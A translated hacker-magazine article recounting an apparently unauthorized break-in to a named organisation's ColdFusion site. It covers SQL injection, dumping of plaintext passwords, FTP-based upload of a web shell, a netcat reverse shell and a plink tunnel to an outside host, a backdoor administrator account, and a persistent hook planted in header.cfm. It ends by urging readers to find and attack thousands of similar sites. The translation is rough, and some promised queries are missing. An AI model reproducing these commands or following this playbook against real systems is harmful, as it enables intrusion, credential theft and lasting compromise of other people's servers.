Any break-in pursues its own aim, which determines its value. It's up to you
to decide whether to deface a site for the latent risqué things lovers or to
screw up another root shell. The reality is that any vulnerability in a web
application poses a threat to the server. And if you don't confine yourself to
the trite and somewhat boring SQL injections so this article is right for you.
The victim's address is at input, the admin access via RDP is at output – these
are classics of penetration!
The Prelude, or How It All Began
And the beginning was trivial. At first there was a URL. For some reason
someone was very interested in this URL, and I had to see what could be done to
it. The URL at once got to Firefox, which quickly delivered a result: an
institute or something of the kind, heaps of links, news, a menu and other
garbage. My mouse was quickly jumping from one link to another, and my spirits
were slowly rising. I've always liked sites with a huge amount of question marks,
parameters such as id and numerical values in links... And to tell the truth the
site was stuffed with such things not less than a dump with trash.
Having looked upon the icon of my favourite scanner I grinned and decided
however not to bother the admins but to turn to the Great Index and solve
everything quietly and peacefully. So, here goes a magic phrase "insite:ism.ws”,
then a Search button and... may we say the thing is over?
About 10,000 results given by Google promised a laborious task. Firefox
quickly acquired tabs, to which flew all sorts of quotation marks, equations,
hyphens, and other evil spirits.
Chapter 1, or All of Us are Sinful
The practice shows that almost every big resource has injections. For sure
there is at least one small, invisible and filterable injection. One just has to
look closely. And the cherished fruit was found at the following address:
Everything turned out to be so trivial, that there was no doubt about the
success of the subsequent activities. The familiar blue-grey ColdFusion error
page appeared in front of me and showed the full SQL-query and DBMS type (SQL
Server), and script's local address. Generally speaking the self-descriptiveness
of errors delivered by ColdFusion is just amazing, - even the full call stack is
given, more than one could ever take.
Chapter 2, or Long Live the Errors
icrosoft DB server has always amazed me by its capabilities. I'm not talking
about standards which all DBMS developers interpret in their own way. However
guys from Microsoft follow their own, unknown to the others way. For example I
like to work with a SQL server. You don't need to select the number of columns
or their types, you just cause a conversion error and the answer will contain
the full information from the base as on a silver plate. It's very convenient!
At first we'll check the output capability:
In response we get the following error:
[Macromedia][SQLServer JDBC Driver][SQLServer]
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 -
8.00.2050 (Intel X86) Mar 7 2008 21:29:56 Copyright (c) 1988-2003 Microsoft
Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
:RDCMS-ISM-Core:rms:ISMSQL01' to a column of data type int.
Thus we have a not too fresh server and the RDCMS-ISM-Core base. Having
looked at them closely I almost jumped up with joy: the CMS abbreviation was
clearly giving to understand that this site had been tossed off not on one's
laps but some big and respectful company had written this wonder and made lots
of money. But we'll talk about it a bit later. The DB structure is next in turn.
At this stage I don't like the brainchild of Microsoft that much. Not only
did the developers not find time to create a normal results paging but they also
did not manage to implement row_number Windows 2000 server. So, a cool erotic
adventure using the TOP construction is waiting for us. TOP is a trick which
allows to get several first entries upon query. But it is impossible to indicate
the entry to begin with, and this is very inconvenient taking into consideration
the circumstances of our unreal hacking. Of course one may follow the standard
way: to get one entry by another, memorize and omit them during the following
queries. But I don't get off on this method because it is hardly automated and
the URL is not long enough so it will fail for the large databases.
That's why we'll deceive everybody. We'll sort up and down and get an
acceptable paging. We'll spare the server and add the field name checking
conditions – let them contain some passwords. And for the process to be
ultimately cool let's first of all determine their amount (query samples are
given below). So, it's 9 of them. Let's go!
The ES_LoginInfo (RDCMS-ISM-Core : dbo : ES_LoginInfo : Password) table at
once caught my eye. Well, one may rub his hands and order a pizza. But nothing
of the sort. Having determined the table structure I got the following picture.
Three interesting fields were present in the table: EntityID, Username and
Password. I think there is no need to explain that I quickly made a new query
series and saw the users' data. The passwords were available and I could rush at
breakneck speed to the site for the desired admin panel. By the way when I
reached the sources I could hardly understand why the passwords had not been
enciphered when the CMS developers had provided for it (SHA-1, SHA-512, MD5) and
even had implemented their own algorithm (iMIS). But okay I logged in, examined
the site and returned to the dump of the database structure because 8 more
tables had fields with the passwords.
How Paging Can Be Done?
Every hacker dreams of getting all the data from a database upon one
query. However life sets its own conditions and as a rule a hacker has to
get information line by line. But the trouble is that each of the DBMS
developers decided to worsen the situation in his own way. So, let's talk
about the schemes of data paging.
- MySQL. It offers the following construction: limit [offset, ]rowcount.
Choose "rowcount” (in our case it's 1) starting with the "offset” row.
- Oracle. Use the pseudo column "rownum”. The problem is that "rownum”
is generated automatically and it is impossible, for example, to set a
condition like "rownum=n”. Such a query will return an empty result. One
cannot do without subqueries here:
select fieldname from (select a.fieldname, rownum r from (select
fieldname from tablename) as a where r=<offset>)
- SQL Server 2005. Here we choose a standard way: use row_number().
select field1, field2 from (select row_number() over (order by
a.field1) as r, a.field1, a.field2 from (select field1, field2 from
tablename) as a) as b where r=<offset>
- SQL Server 2000. The situation is tough here: we've got only TOP.
Let's apply such a secret: if we need to choose an entry which number is
"offset” first let's choose TOP <offset> of entries with an ascending
sort, and then choose the first entry with a descending sort out of the
returned result. As a result the last row becomes the first one and …
the thing is done. But you need to remember that in order to get a
correct result you should sort all the fields in the query.
Chapter 3, or Access is Gained
The next table to attract my attention was a SM_Sites table which contained a
column, and its uncomplicated name was FTPPassword. As it turned out the table
also contained the FTPUserName and FTPServer columns. Having gathered the data
from the table I saw that ftp.rd.net and ftp2.rd.net were used as servers. The
developers' site is hosted exactly at the rd.net address and it was found out
that CMS itself has a proud name of Results Direct. I never understood why the
account data was kept in the base, but the data fit the ftp server. And the
account named ism.ws.prod.code evoke optimistic ideas which by the way were
confirmed soon. The FTP root resembled the root of the site itself. Having
tested the availability of several scripts I finally established the fact of
folders and files mapping. The FTP access opened new ways to uploading files to
the server and saved from the inevitable difficulties connected with digging out
the functional of the admin panel and searching ways to get the shell.
Chapter 4, or ColdFusion
I suppose everybody knows what to do with FTP. An idea to support the
commands execution on the server and to get out of tight embrace of a web
application at once crosses one's mind. Obviously we need a web shell which will
allow to wander about the server and execute commands. But the trouble is that
no trace of PHP or Perl at worst was detected. And it means that the moment of
truth has come: we'll have to program in ColdFusion. According to the developers
this environment is very flexible and easy to master but for some reason I don't
like it at all. So, we'll Google the topic of web shells and terribly fail. All
links were leading to one and the same plain piece of code which can only
execute commands. Well okay let's complement and add this and that, we only need
to use the equipment. Some time was spent on a really cool development which
resulted in two offsprings. The first one shows us dirs and files, the second
one listens to us and follows our orders.
The files quickly took their places. Soon after I understood that I'd gained
privileges of the SYSTEM account, and it was really cool. I just could not rest
on my laurels.
Chapter 5, or Blackle
The web shell is for sure a great thing but it is not as convenient as it may
seem. We need to take the bull by its horns and get a normal console. The Total
at once applied netcat to the FTP. Netcat was launched on the Dedicated Server
in promiscuous mode: "nc.exe –l –p 1234". The following command was executed: "
/c nc.exe m0r0superdedik.com 1234 –e cmd". The shot was fired and the
shell was put to the consoles. Having examined the file system and launched
something about ten utilities, I decided that Windows without windows was a
disaster. In 1999 there were no monads, I loathed to install anything, however
for some reason the server managing was very inconvenient. The Netstat showed
port 3389, and my eyes shone with joy. The very important and needful commands
flew to the shell.
net user st password /add
net localgroup Administrators st /add
Though the mstsc command execution lead to a total failure because there
arrived a message telling that the host was unavailable. NMAP disappointed me
more than the previous one, because only port 80 and port 25 turned out to be
opened. The host was obviously protected by the Firewall and port 3389 was
trivially blocked. I did not want to give up, so I quickly made a list of the
possible means of getting the graphic interface:
Chapter 6, or Hello, Windows
The main problem was to organize the outcoming connection to our Dedicated
Server. The netcat experience had clearly shown that the ports were blocked only
for the incoming connections so the organization of the outcoming connection
from some graphic control system would certainly give an opportunity to manage
the server. Of course the choice fell on VNC. The VNC deployment scheme is in
general pretty simple (for TightVNC, for example):
- Upload winvnc.exe and wm_hooks.dll to the server.
- Install and start the VNC server.
net start "VNC Server"
- Start the client on the Dedicated Server in promiscuous mode.
- Execute the reverse-connect command.
winvnc.exe –connect <host>:<port>.
We've done almost everything except for one small detail. That was the access
to the desktop. All my cherished hopes started fading because the shell had the
SYSTEM account privileges. We would not have even tried if we had not been
hackers, but, just as had been expected, all the attempts failed. I even tried
Metasploit with the windows/vncinject/reverse_tcp payload (it's a very slow
thing) but the Great Framework did not help either. The principle of the VNC
deployment to the server via a non-interactive shell and having no access to the
desktop stayed unknown. In fact I even was glad – why did we have to use VNC if
there was RDP? We only had to get through the Firewall.
The brilliant idea concerning PPTP is to establish a PPTP connection to our
Dedicated Server and then to address the node via the intrinsic addressing with
the tunneling of the traffic through the Firewall. In Windows all the
connections are adapted graphically but there should be a way to work using a
console. Start Procmon by Russinovich on the testing machine and monitor the
register in a moment when the client activates the connection to the net. The
result just can not be interpreted logically because nothing interesting happens
to the register. Microsoft has surpassed itself. What was the use of creating a
register if its own modules don't use it? They should think it over in their
spare time and meanwhile we found a "phone book” at C:\Documents and Settings\All
Users\Application Data\ Microsoft\Network\Connections\Pbk\rasphone.pbk, in which
actually the parameters of the connection to the Dial-up and VPN networks were
described. Establish a connection to the Dedicated Server (with the installed
and adapted RRAS service) on the testing machine and copy the received file (rasphone.pbk)
to the cracked host. Then create the following command file:
rasdial connection_name user password
route add 0.0.0.0 mask 0.0.0.0 remotehostgateway
We need the second line to restore the route by default after the connection
so that our Dedicated Server would not undertake for the traffic routing. I open
the .bat file and was just knocked out. I would never get my hand near the
connection, the Firewall seemed to block the outcoming connections on the basis
of the protocol type. Our GPE-traffic had gotten to the Blacklist as well.
We had almost given way to despair but we didn't give up. To tell the truth
we'd been that dumb for a pretty long time, because we had had to turn to SSH
for help right away. By the way it's a very high-end thing and this has been
more than once discussed in ][. Not only can we get a shell but also we can
invent lots of other interesting things. Our last hope was to successfully take
only three steps:
- to launch SSH server on the Dedicated Server
- to upload the SSH client to the node
- to connect and create the needed port mapping
I can understand a lot of things but I don't know why in the 21st century
Windows does not have a built-in SSH server. Well okay, we'll choose anyone, all
the more so there are lots of them. Of course our favourite PuTTY is used as the
client. But it's not just PuTTY, it's the magic one. If you remember when
addressing a new node PuTTY sincerely suggests to store the signature in the
cache. Our access to the command line is not characterized by the interactivity,
so we wouldn't be able to answer this question. It means that we need the
signature to be stored automatically, but PuTTY can't do that. Having googled a
little bit we found Quest PuTTY 0.60_q1.129. It's the same plus what we need!
Upload plink.exe to the server and execute the following command:
plink.exe -nc m0r0superdedik.com:22 -batch -pw password -R
3390:127.0.0.1:3389 -L 3390:127.0.0.1:3390 -l st -auto_store_key_in_cache
Check the SSH server consoles and get absolutely happy because the connection
is established! Now start mstsc and connect to localhost:3390. We see the entry
window of Windows 2000. Enter the data added with the help of the "net user
administrator” and enjoy the graphics with the administrator's privileges.
Hurrah, it's time to take a sip of a real rock'n'roll drink that is whisky and
to celebrate the success.
Chapter 7, or Let there be an Automation
At first sight everything's wonderful, but to open the web shell every time
and start a command to connect via SSH on the next day had become too tiresome.
That's why the coolest ColdFusion shell was a little bit modified for the
execution of the connection command without any human participation. The shell
modification code may be found on our DVD.
A piece of the code was hidden in the following file: header.cfm, which in
its turn connects to almost any CMS files. Then create a simple form, indicating
any *.cfm file on the server and get a simple way of organizing RDP.
<form action="http://www.ism.ws/about/MediaRoom/RequestForm.cfm" method="POST">
size="20" name="port" value="22"></input></td></tr>
<tr><td></td><td><input type="submit" value="GO!"></td></td>
The Epilogue, or Everything is Just Up to Begin
When the CMS developer's site was found I was eager to test its durability.
The error in CMS was at the same place. But the SM_Sites table contained only
one empty entry, and my dreams about FTP did not come true. The passwords were
enciphered apparently by that very ominous iMIS (the length was 120 bits). I
didn't feel like busying myself with it, so we decided to leave it for you. And
in order to receive a stimulus type inurl:navItemNumber in Google and 12000
entries will lure and inspire you to perform exploits.
Carry any work to completion even if it seems absolutely unreal, otherwise
any initiative of yours becomes pointless. All the described above actions were
taken while listening to the music of Brahms (thanks to "_xCort_" from
torrents.ru). Paraphrasing the words of the "Smoke Under Water” program
permanent dj Kirill Nemolyayev "Listen to the classics and be happy!”
To make the vulnerability search automated you may use the following products:
acunetix.com/vulnerability-scanner/ - Accunetix Web Vulnerability Scanner
cirt.net/nikto2 – Nikto.
The process of manual retrieving the information from the DB is tiresome and
thankless. Look closely at the automation means (or develop your own product),
for example, SIPT. IMHO the program often glitches, works in a single-flow way
but it copes with its task well.
Read the full version of the article in the June issue of HACKER.
Warning: this material is provided for informational purposes only. Neither
the author nor the editorial board is responsible for your actions!